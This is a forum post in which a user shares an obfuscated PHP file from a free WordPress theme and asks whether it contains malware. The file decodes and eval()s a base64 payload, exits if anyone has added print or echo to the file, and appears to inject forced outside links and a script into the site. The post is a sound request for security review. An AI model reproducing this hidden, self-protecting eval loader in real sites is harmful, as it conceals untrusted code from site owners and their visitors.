Hi, this comes from a free/GPL wordpress theme as file blog-cms.php
http://www.elegantwpthemes.com/?p=530 so I am not trying to steal but I am rather afraid that the files has been infected/used for malware so I want to see the “guts” before I start to send users to my site.
Seems like obfuscation of some kind:
<?php if (!function_exists(“T7FC56270E7A70FA81A5935B72EACBE 29”)) { function T7FC56270E7A70FA81A5935B72EACBE29($TF186217753C37B 9B9F958D906208506E) { $TF186217753C37B9B9F958D906208506E = base64_decode($TF186217753C37B9B9F958D906208506E); $T7FC56270E7A70FA81A5935B72EACBE29 = 0; $T9D5ED678FE57BCCA610140957AFAB571 = 0; $T0D61F8370CAD1D412F80B84D143E1257 = 0; $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[1]) << 8) + ord($TF186217753C37B9B9F958D906208506E[2]); $T3A3EA00CFC35332CEDF6E5E9A32E94DA = 3; $T800618943025315F869E4E1F09471012 = 0; $TDFCF28D0734569A6A693BC8194DE62BF = 16; $TC1D9F50F86825A1A2302EC2449C17196 = “”; $TDD7536794B63BF90ECCFD37F9B147D7F = strlen($TF186217753C37B9B9F958D906208506E); $TFF44570ACA8241914870AFBC310CDB85 = FILE; $TFF44570ACA8241914870AFBC310CDB85 = file_get_contents($TFF44570ACA8241914870AFBC310CDB 85); $TA5F3C6A11B03839D46AF9FB43C97C188 = 0; preg_match(base64_decode(“LyhwcmludHxzcHJpbnR8ZWNo bykv”), $TFF44570ACA8241914870AFBC310CDB85, $TA5F3C6A11B03839D46AF9FB43C97C188); for (;$T3A3EA00CFC35332CEDF6E5E9A32E94DA<$TDD7536794B6 3BF90ECCFD37F9B147D7F { if (count($TA5F3C6A11B03839D46AF9FB43C97C188)) exit; if ($TDFCF28D0734569A6A693BC8194DE62BF == 0) { $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8); $TF623E75AF30E62BBD73D6DF5B50BB7B5 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]); $TDFCF28D0734569A6A693BC8194DE62BF = 16; } if ($TF623E75AF30E62BBD73D6DF5B50BB7B5 & 0x8000) { $T7FC56270E7A70FA81A5935B72EACBE29 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 4); $T7FC56270E7A70FA81A5935B72EACBE29 += (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]) >> 4); if ($T7FC56270E7A70FA81A5935B72EACBE29) { $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) & 0x0F) + 3; for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $T0D61F8370CAD1D412F80B84D143E1257++) $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1 D412F80B84D143E1257] = $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012-$T7FC56270E7A70FA81A5935B72EACBE29+$T0D61F8370CAD1 D412F80B84D143E1257]; $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571; } else { $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8); $T9D5ED678FE57BCCA610140957AFAB571 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) + 16; for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1 D412F80B84D143E1257++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]); $T3A3EA00CFC35332CEDF6E5E9A32E94DA++; $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571; } } else $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]; $TF623E75AF30E62BBD73D6DF5B50BB7B5 <<= 1; $TDFCF28D0734569A6A693BC8194DE62BF–; if ($T3A3EA00CFC35332CEDF6E5E9A32E94DA == $TDD7536794B63BF90ECCFD37F9B147D7F) { $TFF44570ACA8241914870AFBC310CDB85 = implode(“”, $TC1D9F50F86825A1A2302EC2449C17196); $TFF44570ACA8241914870AFBC310CDB85 = “?”.“>”.$TFF44570ACA8241914870AFBC310CDB85.“<”.“?” ; return $TFF44570ACA8241914870AFBC310CDB85; } } } } eval(T7FC56270E7A70FA81A5935B72EACBE29(“QAAAPD9waH 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 K8ywRPwAAPg==”)); ?>